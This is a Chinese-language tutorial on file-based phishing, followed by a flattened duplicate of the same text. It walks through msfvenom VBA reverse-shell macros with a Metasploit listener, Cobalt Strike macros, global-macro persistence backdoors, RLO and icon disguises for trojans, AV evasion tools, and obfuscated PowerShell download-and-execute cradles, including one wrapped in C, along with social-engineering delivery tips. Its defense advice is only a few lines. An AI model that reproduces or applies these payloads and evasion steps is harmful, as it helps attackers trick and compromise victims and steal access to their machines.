文件钓鱼攻击技术详解

一、Office宏攻击

1. 宏攻击基础

宏是微软Office软件包的特殊功能，支持自动化操作，但也可被用于恶意目的。宏文件具有独特的后缀名：

.docm (Word宏文档)
.xlsm (Excel宏工作簿)
.pptm (PowerPoint宏演示)

2. 使用MSF生成宏Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -f vba -o payload.vba

参数说明：

-p: 指定Payload类型
LHOST: 监听主机IP
LPORT: 监听端口
-f vba: 生成VBA宏格式
-o: 输出文件名

3. 创建恶意宏文档步骤

新建支持宏的Office文件(.docm)
启用开发工具：文件→选项→自定义功能区→勾选"开发工具"
点击"宏"按钮创建新宏
将生成的VBA代码粘贴到宏编辑器中
保存文档

4. 监听与触发

使用MSF开启监听：

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST IP地址
set LPORT 端口
exploit

当受害者打开文档并启用宏内容后，攻击者将获得反弹shell。

二、Cobalt Strike宏攻击

在Cobalt Strike中选择监听器
生成Office宏代码
复制代码到Office宏编辑器中
保存并发送给目标

三、高级宏利用技术

1. 远程模板注入

通过DOCX文档远程模板注入执行宏，可绕过部分检测。

2. 全局宏持久性后门

新建宏，位置选择"所有活动模板和文档"
在ThisDocument中写入恶意代码
保存后，打开任意文档都会触发宏代码

特点：

隐蔽性强
杀软通常无反应
持久性高

四、可执行文件钓鱼

1. 文件伪装技术

(1) 后缀名隐藏

经典方法：filename.jpg.exe（Windows默认隐藏已知扩展名）
SCR扩展名：.scr等同于.exe但可能被安全软件标记
Unicode RLO反转：
```
重要资料xgpj.scr → 修改为"重要资料xgpj←.scr"
```
通过插入RLO控制字符实现显示反转

(2) 图标更换

使用Restorator工具：

将木马文件和目标EXE拖入软件
拖拽目标图标到木马文件
保存修改后的文件

2. 免杀技术

(1) 'A''V'lator免杀工具

功能：

使用AES加密shellcode
支持多种注入技术
内置RTLO和图标更换功能

使用步骤：

生成C#格式的Payload
保留16进制，去除空格
复制到Payload框进行加密
选择注入技术和伪装选项
生成最终文件

(2) PowerShell免杀

基础Payload：

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/'))"

免杀技巧：

关键字拆分：

powershell.exe "$a1='IEX ((new-object net.webclient).downl';$a2='oadstring(''http://x.x.x.x''))';$a3="$a1,$a2";IEX(-join $a3)"

通过其他语言调用：

#include<stdio.h>
#include<stdlib.h>
int main(){
    system("powershell.exe \"$a1='IEX ((new-object net.webclient).downl';$a2='oadstring(''http://x.x.x.x''))';$a3=\"$a1,$a2\";IEX(-join $a3)\"");
    return 0;
}

编译为EXE后可绕过多数杀软检测

五、实战注意事项

社会工程学：
- 收集目标信息
- 设计可信文件名（如"XX公司采购说明.docm"）
- 通过可信渠道发送（如伪装成业务邮件）
宏攻击局限性：
- 目标未使用Office
- Office默认禁用宏并会显示警告
- 特殊扩展名可能引起怀疑
- 免杀要求高
文件钓鱼关键点：
- 文件伪装（名称、图标、扩展名）
- 免杀处理
- 可信的传播方式

六、防御建议

禁用Office宏或设置为高安全级别
显示完整的文件扩展名
警惕不明来源的文档和可执行文件
保持安全软件更新
对员工进行安全意识培训

七、工具列表

MSF (Metasploit Framework)
Cobalt Strike
Restorator（图标修改）
'A''V'lator（免杀生成器）
Notepad++（代码编辑）

通过综合利用这些技术和工具，攻击者可以构造高度隐蔽的文件钓鱼攻击。防御方需要全面了解这些技术才能有效防护。

文件钓鱼攻击技术详解一、Office宏攻击 1. 宏攻击基础宏是微软Office软件包的特殊功能，支持自动化操作，但也可被用于恶意目的。宏文件具有独特的后缀名： .docm (Word宏文档) .xlsm (Excel宏工作簿) .pptm (PowerPoint宏演示) 2. 使用MSF生成宏Payload 参数说明： -p : 指定Payload类型 LHOST : 监听主机IP LPORT : 监听端口 -f vba : 生成VBA宏格式 -o : 输出文件名 3. 创建恶意宏文档步骤新建支持宏的Office文件(.docm) 启用开发工具：文件→选项→自定义功能区→勾选"开发工具" 点击"宏"按钮创建新宏将生成的VBA代码粘贴到宏编辑器中保存文档 4. 监听与触发使用MSF开启监听：当受害者打开文档并启用宏内容后，攻击者将获得反弹shell。二、Cobalt Strike宏攻击在Cobalt Strike中选择监听器生成Office宏代码复制代码到Office宏编辑器中保存并发送给目标三、高级宏利用技术 1. 远程模板注入通过DOCX文档远程模板注入执行宏，可绕过部分检测。 2. 全局宏持久性后门新建宏，位置选择"所有活动模板和文档" 在 ThisDocument 中写入恶意代码保存后，打开任意文档都会触发宏代码特点：隐蔽性强杀软通常无反应持久性高四、可执行文件钓鱼 1. 文件伪装技术 (1) 后缀名隐藏经典方法： filename.jpg.exe （Windows默认隐藏已知扩展名） SCR扩展名：.scr等同于.exe但可能被安全软件标记 Unicode RLO反转：通过插入RLO控制字符实现显示反转 (2) 图标更换使用Restorator工具：将木马文件和目标EXE拖入软件拖拽目标图标到木马文件保存修改后的文件 2. 免杀技术 (1) 'A''V'lator免杀工具功能：使用AES加密shellcode 支持多种注入技术内置RTLO和图标更换功能使用步骤：生成C#格式的Payload 保留16进制，去除空格复制到Payload框进行加密选择注入技术和伪装选项生成最终文件 (2) PowerShell免杀基础Payload ：免杀技巧：关键字拆分：通过其他语言调用：编译为EXE后可绕过多数杀软检测五、实战注意事项社会工程学：收集目标信息设计可信文件名（如"XX公司采购说明.docm"）通过可信渠道发送（如伪装成业务邮件）宏攻击局限性：目标未使用Office Office默认禁用宏并会显示警告特殊扩展名可能引起怀疑免杀要求高文件钓鱼关键点：文件伪装（名称、图标、扩展名）免杀处理可信的传播方式六、防御建议禁用Office宏或设置为高安全级别显示完整的文件扩展名警惕不明来源的文档和可执行文件保持安全软件更新对员工进行安全意识培训七、工具列表 MSF (Metasploit Framework) Cobalt Strike Restorator（图标修改） 'A''V'lator（免杀生成器） Notepad++（代码编辑）通过综合利用这些技术和工具，攻击者可以构造高度隐蔽的文件钓鱼攻击。防御方需要全面了解这些技术才能有效防护。